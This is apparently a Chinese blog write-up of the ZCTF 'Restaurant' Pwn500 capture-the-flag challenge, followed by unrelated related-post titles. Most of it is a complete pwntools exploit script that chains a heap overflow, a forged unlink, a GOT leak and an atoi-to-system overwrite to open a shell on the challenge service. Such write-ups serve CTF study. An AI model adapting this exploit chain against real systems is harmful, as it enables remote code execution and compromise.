版权声明:本文为博主原创文章,未经博主允许不得转载。

 这道压轴的题也是名副其实,很有分量。这也是自己第二次做C++类型的PWN。含有两个漏洞,缺一不可,一个漏洞将指定位置覆盖为对象虚表的地址,另外一个漏洞用来堆溢出(DW-Shoot)。

第一个漏洞所在位置:

第二个漏洞所在位置:如果连续对一种食物编辑评论,第二次则可以8字节的溢出,覆盖下一个堆块的堆头。

由于堆块在分配时的对齐策略,堆块分配后可以使用的内存可能比申请的要大。这道题目中,主食/主菜/汤都有3个种类,只有同时能选中主食的第二种,主菜的第二种才能溢出,而这个选择是随机的,POC所以并不能每次都成功,我这个POC成功的概率为1/9,其实多试几次就能顺利拿到shell。我大概试了3-4次就拿到了shell。上图:

 from pwn import *

 import time

 #by wangaohui

 #context.log_level = 'debug'

 s= remote('127.0.0.1',10001)

 time.sleep(2)

 print 'pid of restaurant is :' + str(pwnlib.util.proc.pidof('restaurant')[0])

 raw_input('go!')

 s.recvuntil('Please enter your name: ')

 s.sendline('/bin/sh;')

 s.recvuntil('you are the luckey ')

 heap = int(s.recvuntil('th guest.\n')[:-10])

 print 'heapaddr is %x' %heap

 s.recvuntil('Are you from China? (y/n) ')

 s.sendline('n')

 s.recvuntil('please enter your country: ');

 vtp = 0x404710

 data = 'a'*10 + '\x00' + 'a'*5 + '\x1c\x47\x40\x00'

 s.sendline(data)

 s.recvuntil('How old are you: ')

 s.sendline('')

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('Successfully order a staple food, enjoy it!')

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('Successfully order an entree, enjoy it!')

 '''

 s.recvuntil('8. Finish your order.')

 s.sendline('3')

 s.recvuntil('Successfully order a staple food, enjoy it!')

 '''

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')

 s.sendline('')

 s.recvuntil('How does this dish look: ')

 s.sendline('xxx')

 s.recvuntil('How does this dish taste: ')

 s.sendline('yyy')

 fakefd = heap + 0x20

 fakebk = heap + 0x28

 appcom = 'a'*40 + p64(0x80) + p64(0x90)

 tastecom = p64(0x81) + p64(fakefd) + p64(fakebk)

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')

 s.sendline('')

 s.recvuntil('How does this dish look: ')

 s.sendline(appcom)

 s.recvuntil('How does this dish taste: ')

 s.sendline(tastecom)

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('want to cancel(1,2 or 3 depend on menu): ')

 s.sendline('')

 s.recvuntil('the chef has already started to cook.')

 appcom = 'xxx'

 tastecom = p64(0x6060A0)#atoi's got

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')

 s.sendline('')

 s.recvuntil('How does this dish look: ')

 s.sendline(appcom)

 s.recvuntil('How does this dish taste: ')

 s.sendline(tastecom)

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('Your age: ')

 atoiaddr = int(s.recvuntil('\n')[:-1])

 print 'atoiaddr is:  %x' % atoiaddr

 systemaddr = atoiaddr - 0x36360 + 0x414F0

 print 'systemaddr is:  %x' % systemaddr

 appcom = 'xxx'

 tastecom = 'a'*8 + p64(systemaddr)

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')

 s.sendline('')

 s.recvuntil('How does this dish look: ')

 s.sendline(appcom)

 s.recvuntil('How does this dish taste: ')

 s.sendline(tastecom)

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('3.Just so so!')

 s.sendline('3.Just so so!')

 s.recvuntil('Thank you for your comment,bye!')

 s.interactive()

ZCTF-Restaurant-Pwn500的更多相关文章

  1. CodeForces - 261B Maxim and Restaurant

    http://codeforces.com/problemset/problem/261/B 题目大意:给定n个数a1-an(n<=50,ai<=50),随机打乱后,记Si=a1+a2+a ...

  2. Flo's Restaurant[HDU1103]

    Flo's Restaurant Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/32768 K (Java/Others) ...

  3. Codeforces Testing Round #12 B. Restaurant 贪心

    B. Restaurant Time Limit: 20 Sec Memory Limit: 256 MB 题目连接 http://codeforces.com/contest/597/problem ...

  4. HDU-2368 Alfredo's Pizza Restaurant

    http://acm.hdu.edu.cn/status.php Alfredo's Pizza Restaurant Time Limit: 1000/1000 MS (Java/Others)   ...

  5. hdoj 4883 TIANKENG’s restaurant【贪心区间覆盖】

    TIANKENG’s restaurant Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 131072/65536 K (Java/O ...

  6. hdu2368Alfredo's Pizza Restaurant

    Problem Description Traditionally after the Local Contest, judges and contestants go to their favour ...

  7. HDOJ 4883 TIANKENG’s restaurant

    称号: TIANKENG's restaurant Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 131072/65536 K (Ja ...

  8. Restaurant

    Restaurant Time Limit:4000MS     Memory Limit:262144KB     64bit IO Format:%I64d & %I64u Submit  ...

  9. 九校联考_24OI——餐馆restaurant

    凉心模拟D1T1--最简单的一道题 TAT 餐馆(restaurant) 题目背景 铜企鹅是企鹅餐馆的老板,他正在计划如何使得自己本年度收益增加. 题目描述 共有n 种食材,一份食材i 需要花ti 小 ...

  10. Codeforces828 A. Restaurant Tables

    A. Restaurant Tables time limit per test 1 second memory limit per test 256 megabytes input standard ...

随机推荐

  1. 关于Adobe Flash 11.3 引起的火狐使用问题

    Adobe Flash 更新到11.3之后,为火狐引入Flash沙盒安全模式,但同时,又造成了部分兼容性问题,导致 Windows vista及 Windows 7上部分火狐崩溃,并致使一些使用Fla ...

  2. 武汉科技大学ACM :1005: C语言程序设计教程(第三版)课后习题6.6

    Problem Description 打印出所有"水仙花数",所谓"水仙花数"是指一个三位数,其各位数字立方和等于该本身. 例如:153是一个水仙花数,因为1 ...

  3. Intellij idea 12和设置快捷键修改(加快项目的开发速度与养成良好习惯)

    1.为了养成良好的代码习惯idead中的javascript jSLint能显示不良的代码设置如下    2.Intellij idea 12每一次修改,保存生成都要按ctrl+shift+F9非常影 ...

  4. JQUERY1.9学习笔记 之基本过滤器(一) 动态选择器

    动态选择器:animated Selector 描述:当选择器运行时,选择动态进程中的所有元素.(对动态进程起作用) jQuery( ":animated" ) 注释::anima ...

  5. $(this).val()与this.value的区别?text()与html()的区别?

    $(this).val()与this.value 作用:都是获得当前Dom对象的value值(一般是表单元素) text radio checkbox select 基本没有什么区别,只是: this ...

  6. iscroll.js

    <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <title&g ...

  7. 汉诺塔 Hanoi Tower

    电影<猩球崛起>刚开始的时候,年轻的Caesar在玩一种很有意思的游戏,就是汉诺塔...... 汉诺塔源自一个古老的印度传说:在世界的中心贝拿勒斯的圣庙里,一块黄铜板上插着三支宝石针.印度 ...

  8. MVC4,4月22日,Ninject的另外注入方式。

    学习了Ninject另外两种绑定注入的方式: 1.根据属性绑定      先在特殊的实现借口类中定义属性 使用 2.根据构造函数方式绑定     学习了条件绑定方式(conditional bindi ...

  9. Android 解析JSON数组

    1:服务端是使用PHP,从数据库中查询出一个二维数组,然后调用系统函数以json格式返回给客户端. 返回结果如下:http://192.168.0.116/server/selectTitle2jso ...

  10. HASH JOIN算法

    哈希连接(HASH JOIN) 前文提到,嵌套循环只适合输出少量结果集.如果要返回大量结果集(比如返回100W数据),根据嵌套循环算法,被驱动表会扫描100W次,显然这是不对的.看到这里你应该明白为 ...